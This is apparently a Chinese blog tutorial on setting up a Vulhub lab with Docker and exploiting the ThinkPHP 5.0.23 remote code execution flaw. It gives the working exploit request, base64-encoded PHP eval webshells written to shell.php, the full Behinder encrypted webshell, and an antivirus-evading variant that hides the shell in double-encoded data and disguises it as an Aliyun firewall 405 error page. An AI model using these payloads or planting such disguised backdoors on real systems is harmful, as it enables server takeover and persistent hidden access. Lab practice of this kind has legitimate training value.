得而不惜就该死
-懂王
一、实验准备
1、ubantu环境:
使用阿里云服务器,如需要可以自行部署
二、实验操作
1、下载docker :
apt install docker.io
(1)出现问题

(2)解决 :apt-get update
此处由于apt-get下载命令未更新到最新状态,所以执行命令更新即可

(3)下载docker :apt install docker.io

(5)查看docker版本:docker --version

(6)docker服务设置开机自启:
systemctl start docker
systemctl enable docker
(7)安装docker-compose:
apt install docker-compose

2、使用git拉vulhub代码
php
# 下载根目录,先进入
cd /
# 下载最新vulhub
git clone https://github.com/vulhub/vulhub.git
# 进入下载路径
cd /vulhub
# 构建docker-compose
docker-compose build
# 运行
docker-compose up -d

3、使用docker搭建vulhub靶场
(1)执行命令:docker-compose down
(2)查看已经开启的项目:docker-compose ps
(3)端口冲突
修改docker-compose.yml文件 将第一个参数修改为其他端口号即可
ports键:将本地8888端口映射到远方80端口(HTTP协议)

4、cd vulhub/thinkphp/5.0.23-rce 测试
(1)敲命令
(2)使用工具一键梭哈(冰蝎)
5、准备工作
(1)访问地址:http://blog.yuichan.cn:8888/index.php?s=captcha
(2)post packet(修改处):_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
(3)传入后门:
第一种:
IDw/cGhwIGV2YWwoJF9QT1NUW2NtZF0pOyA/PiA=
<?php eval($_POST[cmd]); ?>
第二种:
<?php eval($_POST['cmd']);?>
PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTvCoD8+

此处使用第一种
编码后:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n IDw/cGhwIGV2YWwoJF9QT1NUW2NtZF0pOyA/PiA= | base64 -d > shell.php
未编码前:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n <?php eval($_POST['cmd']); ?> > shell1.php
5、使用工具梭哈:冰蝎
默认key:rebeyond
key加密后:e45e329feb5d925ba3f549b17b4b3dde
后门webshell:
php
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
免杀后
php
<?php
$username = 'xQPJVob1';
$password = 'UxQPJVob1UdxQPJVob1WxQPJVob1eWNtOXlYM0psY0xQPJVob1c5eWRHbHVaeWd3S1RzS2MyVnpjMmx2Ymw5emRHRnlkQ2dwT3dvZ0lDQWdKR3RsZVxQPJVob1QwaVpUUTFaVE15T1dabFlqVmtPVEkxWWlJN0lDOHY2SytsNWErRzZaS2w1TGk2NkwrZTVvNmw1YStHNTZDQk16TGt2WTF0WkRYbGdMem5tb1RsaVkweE51UzlqZSs4ak9tN21PaXVwT2kvbnVhT3BlV3ZodWVnZ1hKbFltVjViMjVrQ2dra1gxTkZVMU5KVDA1Ykoyc25YVDBrYTJWNU93b0pjMlZ6YzJsdmJsOTNjbWwwWlY5amJHOXpaU2dwT3dvSkpIQnZjM1E5Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW5Cb2NExQPJVob1b3ZMMmx1Y0hWMElpazdDZ2xwWmlnaFpYaDBaVzV6YVc5dVgyeHZZV1JsWkNnbmIzQmxibk56YkNjcEtRb0pld2xQPJVob19KQ1NSMFBTSmlZWE5sTmpSZklpNGlaR1ZqYjJSbElqc0tDUWtrY0c5emREMGtkQ2drY0c5emRDNGlJaWs3Q2drSkNna0pabTl5S0NScFBUQTdKR2s4YzNSeWJHVnVLQ1J3YjNOMEtUc2thU3NyS1NCN0NpQWdJQ0FKQ1FrZ0pIQnZjM1JiSkdsZElEMGdKSEJ2YzNSYkpHbGRYaVJyWlhsYkpHa3JNU1l4TlYwN0lBb2dJQ0FnQ1FrSmZRb0pmUW9KWld4elpRb0pld29KQ1NSd2IzTjBQVzl3Wlc1emMyeGZaR1ZqY25sd2RDZ2tjRzl6ZEN3Z0lrRkZVekV5T0NJc0lDUnJaWGtwT3dvSmZRb2dJQ0FnSkdGeWNqMWxlSEJzYjJSbEtDZDhKeXdrY0c5emRDazdDaUFnSUNBa1puVnVZejBrWVhKeVd6QmRPd29nSUNBZ0pIQmhjbUZ0Y3owa1lYSnlXekZkT3dvSlkyeGhjM01nUTN0d2RXSnNhV01nWm5WdVkzUnBiMjRnWDE5cGJuWnZhMlVvSkhBcElIdGxkbUZzS0NSd0xpSWlLVHQ5ZlFvZ0lDQWdRR05oYkd4ZmRYTmxjbDltZFc1aktHNWxkeUJES0Nrc0pIQmhjbUZ0Y3lrNw==';
header('dddddd:'.$username);
$arr = apache_response_headers();
$template_source='';
foreach ($arr as $k => $v) {
if ($k[0] == 'd' && $k[4] == 'd') {
$template_source = str_replace($v,'',$password);
}
}
$template_source = base64_decode($template_source);
$template_source = base64_decode($template_source);
$key = 'template_source';
$aes_decode=$$key;
@eval($aes_decode);
$fTs3ge = "<!DOCTYPE html>
<html lang="zh-cn">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="data-spm" content="a3c0e" />
    <title>
        405
    </title>
    <script src="//g.alicdn.com/code/lib/qrcodejs/1.0.0/qrcode.min.js"></script>
    <style>
        html,
        body,
        div,
        a,
        h2,
        p {
            margin: 0;
            padding: 0;
            font-family: 微软雅黑;
        }

        a {
            text-decoration: none;
            color: #3b6ea3;
        }

        .container {
            width: 1000px;
            margin: auto;
            color: #696969;
        }

        .header {
            padding: 50px 0;
        }

        .header .message {
            height: 36px;
            padding-left: 120px;
            background: url(https://errors.aliyun.com/images/TB1TpamHpXXXXaJXXXXeB7nYVXX-104-162.png) no-repeat 0 -128px;
            line-height: 36px;
        }

        .main {
            padding: 50px 0;
            background:
                #f4f5f7;
        }

        .main img {
            position: relative;
            left: 120px;
        }

        .footer {
            margin-top:
                30px;
            text-align: right;
        }

        .footer a {
            padding: 8px 30px;
            border-radius:
                10px;
            border: 1px solid #4babec;
        }

        .footer a:hover {
            opacity: .8;
        }

        .alert-shadow {
            display: none;
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height:
                100%;
            background: #999;
            opacity: .5;
        }

        .alert {
            display: none;
            position:
                absolute;
            top: 200px;
            left: 50%;
            width: 600px;
            margin-left: -300px;
            padding-bottom:
                25px;
            border: 1px solid #ddd;
            box-shadow: 0 2px 2px 1px rgba(0, 0, 0, .1);
            background: #fff;
            font-size: 14px;
            color: #696969;
        }

        .alert h2 {
            margin:
                0 2px;
            padding: 10px 15px 5px 15px;
            font-size: 14px;
            font-weight: normal;
            border-bottom: 1px solid #ddd;
        }

        .alert a {
            display: block;
            position: absolute;
            right: 10px;
            top: 8px;
            width: 30px;
            height: 20px;
            text-align: center;
        }

        .alert p {
            padding: 20px 15px;
        }

        #feedback-container {
            width: 110px;
            margin: auto;
            margin-top: 120px;
            text-align: center;
        }

        #qrcode {
            margin: 0 15px 5px 15px;
        }

        #feedback a {
            color: #999;
            font-size: 12px;
            margin-top: 5px;
        }
    </style>
</head>

<body data-spm="7663354">
    <script>
        with (document) with (body) with (insertBefore(createElement("script"), firstChild)) setAttribute("exparams", "category=&userid=685308295&aplus&udpid=VWeUOceQJdKj&&yunid=&e93b4e3e75e05&trid=6525b79615839206094003938e&asid=AYf52CjhtWhe+af+HQAAAACWA/SInO3QLw==", id = "tb-beacon-aplus", src = (location > "https" ? "//g" : "//g") + ".alicdn.com/alilog/mlog/aplus_v2.js")
    </script>
    <script>
        //
        var i18nObject = {
            "zh-cn": {
                "message": "很抱歉，由于您访问的URL有可能对网站造成安全威胁，您的访问被阻断。",
                "bgImg": "https://errors.aliyun.com/images/TB15QGaHpXXXXXOaXXXXia39XXX-660-117.png",
                "report": "误报反馈",
            },
            "en-us": {
                "message": "Sorry, we have detected malicious traffic from your network, please try again later.",
                "bgImg": "https://img.alicdn.com/tfs/TB1ADAOIFzqK1RjSZSgXXcpAVXa-1320-234.jpg",
                "report": "Report",
            }
        }
        var i18n = i18nObject["en-us"];
        if (navigator.language.indexOf("zh") >= 0) {
            i18n = i18nObject["zh-cn"];
        }

    </script>

    <div data-spm="1998410538">
        <div class="header">
            <div class="container">
                <div class="message">
                    <script>document.write(i18n.message)</script>
                </div>
            </div>
        </div>
        <div class="main">
            <div class="container">
                <script>document.write('<img width="660" height="117" src="' + i18n.bgImg + '"/>')</script>

            </div>
        </div>
        <div class="footer">
            <div class="container">
                <span style='display:none'>
                    <script>
                        function getQueryString(url, name) {
                            var reg = new RegExp('(^|&)' + name + '=([^&]*)(&|$)');
                            var r = url.substr(1).match(reg);
                            if (r !== null) return unescape(r[2]); return null;
                        }
                        var __uuid___ = getQueryString(location.href, "uuid")
                    </script>
                </span>
                <a target="_blank" id="report" href="javascript:;" data-spm-click="gostr=/waf.123.123;locaid=d001;">
                    <script>document.write(i18n.report)</script>
                </a>
            </div>
        </div>
    </div>
    <div id="alertShadow" class="alert-shadow">
    </div>
    <div id="alertContainer" class="alert">
        <h2>
            提示：
            <a href="javascript:;" title="关闭" id="closeAlert">
                X
            </a>
        </h2>
        <p>
            感谢您的反馈，应用防火墙会尽快进行分析和确认。
        </p>
    </div>
    <div id="feedback-container">
        <div id="qrcode"></div>
        <div id="feedback"></div>
    </div>
    <script>
        function show() {
            var g = function (ele) {
                return document.getElementById(ele);
            };
            var reportHandle = g('report');
            var alertShadow = g('alertShadow');
            var alertContainer = g('alertContainer');
            var closeAlert = g('closeAlert');
            var own = {};
            own.report = function () { 
                own.alert();
            }; own.alert = function () { alertShadow.style.display = 'block'; alertContainer.style.display = 'block'; }; own.close = function () { alertShadow.style.display = 'none'; alertContainer.style.display = 'none'; };
        };

        var uuid = location.href.match(/uuid=([^&]+)/);
        uuid = uuid && encodeURIComponent(uuid[1]);
        var urlQrCode = location.href.match(/qrcode=([^&]+)/);
        urlQrCode = urlQrCode && decodeURIComponent(urlQrCode[1]);
        if (uuid || urlQrCode) {
            var qrcode = new QRCode(document.getElementById("qrcode"), {
                text: urlQrCode || uuid,
                width: 80,
                height: 80,
                colorDark: "#999",
            });
            var feedbackLink = getFeedbackLink();
            document.getElementById("feedback").innerHTML = feedbackLink;
        }
        function getFeedbackLink() {
            var urlOrigin;
            urlOrigin = location.href.match(/origin=([^&]+)/);
            urlOrigin = urlOrigin && decodeURIComponent(urlOrigin[1]).split("?")[0];
            if (urlOrigin) {
                try {
                    urlOrigin = new URL(urlOrigin);
                    if (urlOrigin.protocol !== "https:" && urlOrigin.protocol !== "http:") {
                        urlOrigin = null;
                    } else {
                        urlOrigin = urlOrigin.href;
                    }
                } catch (e) {
                    if (typeof urlOrigin !== "string" || urlOrigin.indexOf("http") !== 0) {
                        urlOrigin = null;
                    } else {
                        urlOrigin = filterHtml(urlOrigin);
                    }
                }
            }
            var _language = navigator.browserLanguage || navigator.language;
            var text = ["zh-CN", "zh-cn"].includes(_language) ? "点我反馈 >" : "Click to feedback >";
            return '<a href="' + urlOrigin + '/_____tmd_____/page/feedback?rand=S3WxGHAgAt756EpznwfNzJq2AFA2qBNla3j6EINUS8We9dazM_iKElp8DwVSHZUevpC41Bx7RzivXIj9RnZgdg&uuid=' + encodeURIComponent(uuid) + '&type=6" target="_blank">' + text + '</a>';
        };
        function filterHtml(str) {
            str = str.replace(/&/g, "");
            str = str.replace(/>/g, "");
            str = str.replace(/</g, "");
            str = str.replace(/"/g, "");
            str = str.replace(/'/g, "");
            str = str.replace(/`/g, "");
            str = str.replace(/javascript/g, "");
            str = str.replace(/iframe/g, "");
            return str;
        }

    </script>
    <script type="text/javascript" charset="utf-8" src="https://errors.aliyun.com/error.js?s=10">
    </script>
</body>

</html>";
if( count($_REQUEST) || file_get_contents("php://input") ){
}else{
header('Content-Type:text/html;charset=utf-8'); http_response_code(405);
echo base64_decode/**/($fTs3ge);
}
至此结束!
此处并没有添加相关实验结果,如果大家需要可以私信解决问题。全部无偿,尽我可能解答,共同进步!